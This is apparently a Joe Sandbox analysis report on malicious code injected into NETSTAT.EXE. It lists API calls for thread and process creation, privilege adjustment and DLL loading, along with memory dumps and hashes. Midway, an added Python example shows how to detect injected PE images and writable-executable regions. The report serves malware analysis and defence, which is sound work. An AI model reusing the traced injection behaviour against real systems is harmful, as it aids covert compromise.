                                                                                                                                                                                   • Blocks 26ba632-26ba671: entry 26ba632-26ba656 -> 26ba65c-26ba671 RtlFreeHeap directly, or via 26ba657 call 26baf30 -> 26ba65c
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,026A3AF8), ref: 026BA66D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                                                  • Opcode ID: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
                                                                                                                                                                                  • Instruction ID: 8bf8ee819ad73fe35e68caa53deab0a8d26de388981505aedf24592802d26903
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F030B12102046BD718DF58DC49EE777ADFF48750F114659F9485B241D631E8118BA0

                                                                                                                                                                                   Control-flow Graph
                                                                                                                                                                                   • Single block 26ba640-26ba671: call 26baf30, then RtlFreeHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,026A3AF8), ref: 026BA66D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                  • Instruction ID: ad726983e88283cf99c979d746412390b057f249d2ece408465e2e7fdc386ff6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7E012B2210208ABDB28EF99CC48EE777ADAF88750F018559BA085B241C630E9108AB0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 026A836A
                                                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 026A838B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                  • Opcode ID: 7e4e56330453795c291b08fc23cbebb4c7108165151036bb208ae8e60e338b98
                                                                                                                                                                                  • Instruction ID: 2b4d782a411b1336b891685bd7e3985a0c78fe18560cbed9737b74a15afd725e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4e56330453795c291b08fc23cbebb4c7108165151036bb208ae8e60e338b98
                                                                                                                                                                                  • Instruction Fuzzy Hash: C401A731A802287BE721A6949C02FFE776D5F40F50F040119FF04BA1C1E6947D064BF9
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 026AAD62
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,026AF1D2,026AF1D2,?,00000000,?,?), ref: 026BA7D0
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 026BA704
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,026AF050,?,?,00000000), ref: 026B91BC
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,026AF050,?,?,00000000), ref: 026B91BC
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• RtlAllocateHeap.NTDLL(026B4536,?,026B4CAF,026B4CAF,?,026B4536,?,?,?,?,?,00000000,00000000,?), ref: 026BA62D
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,026AF1D2,026AF1D2,?,00000000,?,?), ref: 026BA7D0
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,026A8D14,?), ref: 026AF6FB
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 026AAD62
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: eff3fe6dc24380f5858dd6d08efa6238c9e985d93b235b4bb6d60cff4e732654
                                                                                                                                                                                  • Instruction ID: 62bfdf041f05408db80ff568369a4f49f963db9373a57f750fd1fa0399bcaa8f
                                                                                                                                                                                  • Opcode Fuzzy Hash: eff3fe6dc24380f5858dd6d08efa6238c9e985d93b235b4bb6d60cff4e732654
                                                                                                                                                                                  • Instruction Fuzzy Hash: E2B09B719015D5C7DA11E76047097177D0467D4701F2AC471D3030641E4739C1E1E275
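The region at 0x030A0000 in the entry above is marked "based on PE: true" although it lives in NETSTAT.EXE (process 7) and is distinct from the region at 0x00640000 that holds netstat's own code. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample, showing the check an analyst runs over a process memory map to turn that observation into an injection finding: parse each region for an MZ/PE header and flag any PE that is not a loader-mapped image (MEM_IMAGE), plus any private region that is writable and executable. The `Region` type, `fake_pe()`, the byte contents and the protection/type values are constructed for the example; the report supplies only the base addresses and the PE flag, so those attributes are assumptions, not values read from the dump names.

```python
"""Triage of process memory regions for injected PE images.

Added example, not part of the Joe Sandbox report. It reproduces the
kind of check behind a "based on PE: true" flag on an anonymous
executable region (here modelled on 0x030A0000 inside NETSTAT.EXE).
Region attributes and byte contents are constructed; protection and
type values are assumptions for illustration.
"""
import struct
from dataclasses import dataclass

# Windows memory protection / type constants (winnt.h)
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000


@dataclass
class Region:
    """One entry of a process memory map (hypothetical type for the example)."""
    base: int
    protect: int
    mem_type: int
    data: bytes
    owner: str  # image name of the process that owns the region


def has_pe_header(data: bytes) -> bool:
    """True if data starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(regions):
    """Return (base, reason) tuples for regions that look like injected code.

    Rule 1: a PE header in memory that is not an image mapping (MEM_IMAGE)
            means a module was written into the process by hand rather
            than by the loader.
    Rule 2: private memory that is both writable and executable is the
            usual staging area for manually mapped or hollowed payloads.
    """
    findings = []
    for r in regions:
        if has_pe_header(r.data) and r.mem_type != MEM_IMAGE:
            findings.append((r.base, "unbacked PE image in %s" % r.owner))
        elif r.protect == PAGE_EXECUTE_READWRITE and r.mem_type == MEM_PRIVATE:
            findings.append((r.base, "private RWX region in %s" % r.owner))
    return findings


def fake_pe(size=0x200) -> bytes:
    """Constructed minimal MZ/PE header, just enough for has_pe_header()."""
    buf = bytearray(size)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)  # e_lfanew -> offset 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed sample map: netstat's own loader-mapped image, the anonymous
# region the report marks "based on PE: true", and an ordinary heap block.
SAMPLE_REGIONS = [
    Region(0x00640000, PAGE_EXECUTE_READ, MEM_IMAGE, fake_pe(), "NETSTAT.EXE"),
    Region(0x030A0000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, fake_pe(), "NETSTAT.EXE"),
    Region(0x00A00000, PAGE_READWRITE, MEM_PRIVATE, b"\x00" * 0x100, "NETSTAT.EXE"),
]

if __name__ == "__main__":
    for base, why in triage(SAMPLE_REGIONS):
        print("0x%08X  %s" % (base, why))
```

Only the private region carrying a PE header is reported; the same header inside the MEM_IMAGE mapping at 0x00640000 is what a normally loaded netstat.exe looks like and is left alone. On a live system the region list comes from VirtualQueryEx and the bytes from ReadProcessMemory; the rules do not change.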
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 0064177B
                                                                                                                                                                                  • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 0064178A
                                                                                                                                                                                    • Part of subcall function 00646139: __iob_func.MSVCRT ref: 0064613E
                                                                                                                                                                                    • Part of subcall function 00644662: fgetpos.MSVCRT ref: 00644697
                                                                                                                                                                                    • Part of subcall function 00644662: _fileno.MSVCRT ref: 006446B1
                                                                                                                                                                                    • Part of subcall function 00644662: _setmode.MSVCRT ref: 006446B9
                                                                                                                                                                                    • Part of subcall function 00644662: fwprintf.MSVCRT ref: 006446C5
                                                                                                                                                                                    • Part of subcall function 00644662: fgetpos.MSVCRT ref: 006446DE
                                                                                                                                                                                    • Part of subcall function 00644662: _fileno.MSVCRT ref: 006446F8
                                                                                                                                                                                    • Part of subcall function 00644662: _setmode.MSVCRT ref: 00644700
                                                                                                                                                                                    • Part of subcall function 00644662: _fileno.MSVCRT ref: 00644710
                                                                                                                                                                                    • Part of subcall function 00644662: _write.MSVCRT ref: 00644718
                                                                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 006417C3
                                                                                                                                                                                  • exit.MSVCRT ref: 006417EC
                                                                                                                                                                                  • _strupr.MSVCRT ref: 00641812
                                                                                                                                                                                  • sscanf_s.MSVCRT ref: 00641920
                                                                                                                                                                                  • toupper.MSVCRT ref: 00641946
                                                                                                                                                                                  • toupper.MSVCRT ref: 00641963
                                                                                                                                                                                  • toupper.MSVCRT ref: 00641982
                                                                                                                                                                                  • toupper.MSVCRT ref: 0064199F
                                                                                                                                                                                  • toupper.MSVCRT ref: 006419BC
                                                                                                                                                                                  • toupper.MSVCRT ref: 006419D6
                                                                                                                                                                                  • toupper.MSVCRT ref: 006419F0
                                                                                                                                                                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00641B1D
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00641B36
                                                                                                                                                                                    • Part of subcall function 0064485E: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,000000FF,00000000,00000000,00000001,00000001,?,00642E0C,00000000,00002718,?,00000000,000000FF), ref: 00644885
                                                                                                                                                                                    • Part of subcall function 0064485E: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(000000FF,?,00642E0C,00000000,00002718,?,00000000,000000FF), ref: 0064489D
                                                                                                                                                                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 00641C61
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: toupper$_fileno$FormatFreeLocalMessage_setmodefgetpos$HeapInformationLanguageSleepStartupThread__iob_func_strupr_writeexitfwprintfsscanf_s
                                                                                                                                                                                  • String ID: $%lu$ICMP$ICMPV6$IPV6$TCP$TCPV6$UDP$UDPV6
                                                                                                                                                                                  • API String ID: 2214462882-2943784616
                                                                                                                                                                                  • Opcode ID: 573e3c3e8f7eb8cf158573cbdacdcb81818371506d3f2924f87ddd128922ef5a
                                                                                                                                                                                  • Instruction ID: a608acbdbfd569edbef7858e54ddaf611cb09896a71ad5939f3d50cfc5be5cf5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 573e3c3e8f7eb8cf158573cbdacdcb81818371506d3f2924f87ddd128922ef5a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF1C130A483419FE7689B6498957BE7BE7AF47711F64181EF4C68F291DB34C8C28B06
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,000000FF), ref: 0064217A
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064228D
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064229D
                                                                                                                                                                                  • InternalGetTcpTableWithOwnerModule.IPHLPAPI(?,00000000,00000000), ref: 006422E2
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642324
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642335
                                                                                                                                                                                  • InternalGetTcpTable2.IPHLPAPI(?,00000000,00000000), ref: 00642377
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006423B5
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006423C6
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00642406
                                                                                                                                                                                  • InternalGetBoundTcpEndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00642419
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064243D
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064244E
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0064248A
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006424EA
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006424FA
                                                                                                                                                                                  • InternalGetTcp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00642540
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642582
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642593
                                                                                                                                                                                  • InternalGetTcp6Table2.IPHLPAPI(00000000,00000000,00000000), ref: 006425D1
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064260F
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642620
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00642660
                                                                                                                                                                                  • InternalGetBoundTcp6EndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00642677
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006426AB
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006426BC
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 006426FC
                                                                                                                                                                                  • InternalGetUdpTableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00642718
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642748
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00642780
                                                                                                                                                                                  • InternalGetUdp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00642799
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006427C9
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 006427FE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: htons$Internal$Heap$FreeTable$ModuleOwnerWith$Tcp6$BoundEndpointTable2$ProcessUdp6
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1690255193-0
                                                                                                                                                                                  • Opcode ID: a9615d96e1af7796edf8ee74b23540ed562064b2f74c59105ceb6ea6728019b6
                                                                                                                                                                                  • Instruction ID: 1333936dfb38a55a5948aa81eb019fcb5c24e7801e4bd82b9b225026b392f84f
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9615d96e1af7796edf8ee74b23540ed562064b2f74c59105ceb6ea6728019b6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D325675D00219DFCB25DFA4C894AEEBBB2FF48711F64802AF955A7340DB38A945CB60
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • fprintf.MSVCRT ref: 00644BF0
                                                                                                                                                                                  • GetUdpStatisticsEx.IPHLPAPI(00000008,00000002), ref: 00644C1E
                                                                                                                                                                                    • Part of subcall function 00646139: __iob_func.MSVCRT ref: 0064613E
                                                                                                                                                                                  • GetTcpStatisticsEx.IPHLPAPI(00000008,00000017), ref: 00645161
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Statistics$__iob_funcfprintf
                                                                                                                                                                                  • String ID: %s $%2d.$%3d.$%d.$ReadTable: type = %d$value=%8d oid=
                                                                                                                                                                                  • API String ID: 2761504588-3074728934
                                                                                                                                                                                  • Opcode ID: b12f6aa33d56e02a68ec0de3781fe97c187eb54df446358670d0db20d6c07304
                                                                                                                                                                                  • Instruction ID: 7ce83236be6c199f52734662f00096d7ec8c6afb2c21a2bebc6a54f8a0c828bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: b12f6aa33d56e02a68ec0de3781fe97c187eb54df446358670d0db20d6c07304
                                                                                                                                                                                  • Instruction Fuzzy Hash: E702B235D04209DFCB14DFA8D84ABAEBBB7BB06700F24455AE506AB741DF319D42CB90
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0064391B
                                                                                                                                                                                  • OpenProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000410,00000000,?,00000000,?,00000000), ref: 00643937
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00643B39
                                                                                                                                                                                  • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00643B44
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: Free$LibraryLocalOpenProcessmemset
• String ID: I_QueryTagInformation$\advapi32.dll$rundll32.exe$svchost.exe$Dd
• API String ID: 276527812-705911625
• Opcode ID: 43cef38dfefa7aaafa41c4f35ef8e9b380086979eda04043473ed4037e7edb72
• Instruction ID: dc368f57490b6d9ae196b0c9acb1a806962b7363d1253c62b0d7aeffb2c18cd0
• Opcode Fuzzy Hash: 43cef38dfefa7aaafa41c4f35ef8e9b380086979eda04043473ed4037e7edb72
• Instruction Fuzzy Hash: 4761E6719002246FEB649F24DC89EFEB77BEB56710F0041A9F51AE3381EE719E84CA50
APIs
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,00000000,?,?,?,?,?,?,00642809), ref: 00641D15
• OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,00642809), ref: 00641D1C
• AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,?,00000010,00000000,00000000), ref: 00641D48
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00641D56
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
• String ID: (d
• API String ID: 3874597930-3876776310
• Opcode ID: 2833c9f67404c2ca5abd5eebc449d34f2eaddb4c1f4e5f83dc7e5d0cedd85b3d
• Instruction ID: 676170a874ee788813754e2d7d22c520fc38c231baa57c61f5d87b1af2ece044
• Opcode Fuzzy Hash: 2833c9f67404c2ca5abd5eebc449d34f2eaddb4c1f4e5f83dc7e5d0cedd85b3d
• Instruction Fuzzy Hash: 7A01FFB4A11219AFDB10AFA5DC09AEFBFBDEF0AB50F504059F505A3251CB709A04CBA5
APIs
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0064222F), ref: 00641CA2
• OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0064222F), ref: 00641CA9
• AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00641CD9
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00641CE7
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
• String ID: /"d
• API String ID: 3874597930-557661102
• Opcode ID: 2f816d21da893a0cd969015078ebfc13d41a76fa844478f25d38d945cf297721
• Instruction ID: 54a7855e75a4aaa26e552c066ad345bf7e16c5436f7371832029da5c0610c7a4
• Opcode Fuzzy Hash: 2f816d21da893a0cd969015078ebfc13d41a76fa844478f25d38d945cf297721
• Instruction Fuzzy Hash: 7201FF74911219ABDB109FA5DC49AEFBFBDFF0A750F004059B501E3250CB748A44CBA1
APIs
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00645D66,00641000), ref: 00645C37
• UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(f]d,?,00645D66,00641000), ref: 00645C40
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00645D66,00641000), ref: 00645C4B
• TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00645D66,00641000), ref: 00645C52
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID: f]d
• API String ID: 3231755760-4140951768
• Opcode ID: cdecd3ba2fd4da8969b750ff81b62cb88308ca758aae82b31dcf61a3cced5de1
• Instruction ID: bfa65b3c62f5ae5ebce9a3e8b712d5be8574025cb907a455b6501d5390b1e0f2
• Opcode Fuzzy Hash: cdecd3ba2fd4da8969b750ff81b62cb88308ca758aae82b31dcf61a3cced5de1
• Instruction Fuzzy Hash: C5D01236010204BFC7102BE1FC0CA4E3F6AEB46B12F046400F30D93020CF314489DB51
APIs
• GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00646012
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00646021
• GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0064602A
• GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00646033
• QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00646048
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 07ecbe1750ccd1a41c7a57a195459fcf40a8a4ec03ea87f5e75d8aeb2ca45802
• Instruction ID: 39e24726dd870562312ef5bf713c91869e869ce9fab212be1691524877a533dc
• Opcode Fuzzy Hash: 07ecbe1750ccd1a41c7a57a195459fcf40a8a4ec03ea87f5e75d8aeb2ca45802
• Instruction Fuzzy Hash: 54111CB5D01208DFCB10DFB8EA4869EB7F6FF5A711F515495E501E7210EB309A008B45
APIs
• AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,000000FF), ref: 006458E7
